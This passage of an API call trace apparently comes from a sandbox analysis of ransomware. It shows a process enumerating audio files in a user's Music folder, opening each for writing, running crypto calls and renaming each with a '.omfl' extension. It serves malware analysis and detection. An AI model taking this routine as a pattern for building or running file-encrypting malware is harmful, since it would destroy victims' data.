HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\JiEs6uFYkdZi3.wav.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\jies6ufykdzi3.wav.omfl")) returned 1 [0133.863] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.863] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.863] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.864] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.864] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfde20a80, ftCreationTime.dwHighDateTime=0x1d5e361, ftLastAccessTime.dwLowDateTime=0x4f9c3fd0, ftLastAccessTime.dwHighDateTime=0x1d5da70, ftLastWriteTime.dwLowDateTime=0x4f9c3fd0, ftLastWriteTime.dwHighDateTime=0x1d5da70, nFileSizeHigh=0x0, nFileSizeLow=0x185fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Jk9nLyVoeGsHbH94 FqZ.m4a", cAlternateFileName="JK9NLY~1.M4A")) returned 1 [0133.864] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\Jk9nLyVoeGsHbH94 FqZ.m4a") returned=".m4a" [0133.864] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\Jk9nLyVoeGsHbH94 FqZ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\jk9nlyvoegshbh94 fqz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.865] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=99837) returned 1 [0133.865] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.868] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.869] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.870] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.870] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.870] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.870] GetLastError () returned 0x0 [0133.870] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.870] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.870] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.870] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.870] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.870] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.870] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.872] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\Jk9nLyVoeGsHbH94 FqZ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\jk9nlyvoegshbh94 fqz.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\Jk9nLyVoeGsHbH94 FqZ.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\jk9nlyvoegshbh94 fqz.m4a.omfl")) returned 1 [0133.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.872] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.872] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.874] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.874] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19f7fbd0, ftCreationTime.dwHighDateTime=0x1d5e6e1, ftLastAccessTime.dwLowDateTime=0x97850be0, ftLastAccessTime.dwHighDateTime=0x1d5da77, ftLastWriteTime.dwLowDateTime=0x97850be0, ftLastWriteTime.dwHighDateTime=0x1d5da77, nFileSizeHigh=0x0, nFileSizeLow=0x909e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kih4mb6i7m6.m4a", cAlternateFileName="KIH4MB~1.M4A")) returned 1 [0133.874] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\kih4mb6i7m6.m4a") returned=".m4a" [0133.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\kih4mb6i7m6.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\kih4mb6i7m6.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.874] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=37022) returned 1 [0133.874] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.877] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.878] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.879] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.879] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.879] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.879] GetLastError () returned 0x0 [0133.879] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.879] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.879] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.879] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.879] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.879] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.879] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.880] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\kih4mb6i7m6.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\kih4mb6i7m6.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\kih4mb6i7m6.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\kih4mb6i7m6.m4a.omfl")) returned 1 [0133.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.881] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.882] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8467fe30, ftCreationTime.dwHighDateTime=0x1d5dbe1, ftLastAccessTime.dwLowDateTime=0x8281c730, ftLastAccessTime.dwHighDateTime=0x1d5d8ae, ftLastWriteTime.dwLowDateTime=0x8281c730, ftLastWriteTime.dwHighDateTime=0x1d5d8ae, nFileSizeHigh=0x0, nFileSizeLow=0xf607, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N3rh2ZD.mp3", cAlternateFileName="")) returned 1 [0133.882] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\N3rh2ZD.mp3") returned=".mp3" [0133.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\N3rh2ZD.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\n3rh2zd.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.883] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=62983) returned 1 [0133.883] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.886] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.887] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.887] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.887] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.888] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.888] GetLastError () returned 0x0 [0133.888] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.888] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.888] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.888] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.888] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.888] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.888] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.889] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\N3rh2ZD.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\n3rh2zd.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\N3rh2ZD.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\n3rh2zd.mp3.omfl")) returned 1 [0133.890] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.890] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.890] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.891] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.891] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb649c080, ftCreationTime.dwHighDateTime=0x1d5e0ca, ftLastAccessTime.dwLowDateTime=0x7dcaf470, ftLastAccessTime.dwHighDateTime=0x1d5e568, ftLastWriteTime.dwLowDateTime=0x7dcaf470, ftLastWriteTime.dwHighDateTime=0x1d5e568, nFileSizeHigh=0x0, nFileSizeLow=0xe12c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NbmRD0sYiP-.wav", cAlternateFileName="NBMRD0~1.WAV")) returned 1 [0133.891] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\NbmRD0sYiP-.wav") returned=".wav" [0133.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\NbmRD0sYiP-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\nbmrd0syip-.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.892] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=57644) returned 1 [0133.892] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.895] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.896] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.896] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.896] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.897] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.897] GetLastError () returned 0x0 [0133.897] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.897] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.897] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.897] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.897] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.897] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.897] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.899] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\NbmRD0sYiP-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\nbmrd0syip-.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\NbmRD0sYiP-.wav.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\nbmrd0syip-.wav.omfl")) returned 1 [0133.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.900] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.902] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5f599b0, ftCreationTime.dwHighDateTime=0x1d5df55, ftLastAccessTime.dwLowDateTime=0x793cf0d0, ftLastAccessTime.dwHighDateTime=0x1d5e247, ftLastWriteTime.dwLowDateTime=0x793cf0d0, ftLastWriteTime.dwHighDateTime=0x1d5e247, nFileSizeHigh=0x0, nFileSizeLow=0x9fd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NN3SJo6ahpNKu4SGWC.mp3", cAlternateFileName="NN3SJO~1.MP3")) returned 1 [0133.902] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\NN3SJo6ahpNKu4SGWC.mp3") returned=".mp3" [0133.902] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\NN3SJo6ahpNKu4SGWC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\nn3sjo6ahpnku4sgwc.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.902] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=40920) returned 1 [0133.902] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.906] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.907] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.907] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.907] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.907] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.907] GetLastError () returned 0x0 [0133.907] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.907] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.907] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.907] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.907] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.909] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\NN3SJo6ahpNKu4SGWC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\nn3sjo6ahpnku4sgwc.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\NN3SJo6ahpNKu4SGWC.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\nn3sjo6ahpnku4sgwc.mp3.omfl")) returned 1 [0133.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.910] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.911] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7620ba0, ftCreationTime.dwHighDateTime=0x1d5db42, ftLastAccessTime.dwLowDateTime=0xa03db7e0, ftLastAccessTime.dwHighDateTime=0x1d5e2f2, ftLastWriteTime.dwLowDateTime=0xa03db7e0, ftLastWriteTime.dwHighDateTime=0x1d5e2f2, nFileSizeHigh=0x0, nFileSizeLow=0x5339, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nvFCQREqi.mp3", cAlternateFileName="NVFCQR~1.MP3")) returned 1 [0133.911] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\nvFCQREqi.mp3") returned=".mp3" [0133.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\nvFCQREqi.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\nvfcqreqi.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.911] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=21305) returned 1 [0133.911] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.914] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.915] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.915] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.915] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.915] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.915] GetLastError () returned 0x0 [0133.916] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.916] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.916] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.916] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.916] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.917] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\nvFCQREqi.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\nvfcqreqi.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\nvFCQREqi.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\nvfcqreqi.mp3.omfl")) returned 1 [0133.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.918] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.919] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b082040, ftCreationTime.dwHighDateTime=0x1d5e1bf, ftLastAccessTime.dwLowDateTime=0x76a82ee0, ftLastAccessTime.dwHighDateTime=0x1d5df57, ftLastWriteTime.dwLowDateTime=0x76a82ee0, ftLastWriteTime.dwHighDateTime=0x1d5df57, nFileSizeHigh=0x0, nFileSizeLow=0xdb82, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="owBp0zmdV.m4a", cAlternateFileName="OWBP0Z~1.M4A")) returned 1 [0133.919] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\owBp0zmdV.m4a") returned=".m4a" [0133.919] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\owBp0zmdV.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\owbp0zmdv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.919] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=56194) returned 1 [0133.920] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.923] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.924] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.924] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.924] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.924] 